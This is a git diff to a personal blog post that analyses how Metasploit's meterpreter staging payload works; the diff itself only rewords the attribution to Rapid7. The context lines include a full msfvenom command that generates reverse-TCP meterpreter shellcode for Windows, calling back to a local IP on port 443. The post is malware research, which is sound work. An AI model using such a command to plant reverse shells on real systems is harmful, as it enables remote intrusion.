loland/loland.github.io/_posts/2023-09-20-inner-workings-of-meterpreter.markdown

 categories: malware
 ---

 This blog entry covers personal technical research on the meterpreter staging payload.
-Meterpreter, developed by Metasploit, is a C2 framework used by white and black hats alike.
+Meterpreter, as part of the Metasploit framework developed by Rapid7, is a C2 framework used by white and black hats alike.

 To begin analysis, I generated a 32-bit Windows meterpreter shellcode with the command `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=443 -f c`.
 The objective is to understand how the shellcode loads the necessary DLLs and executes the second stage payload.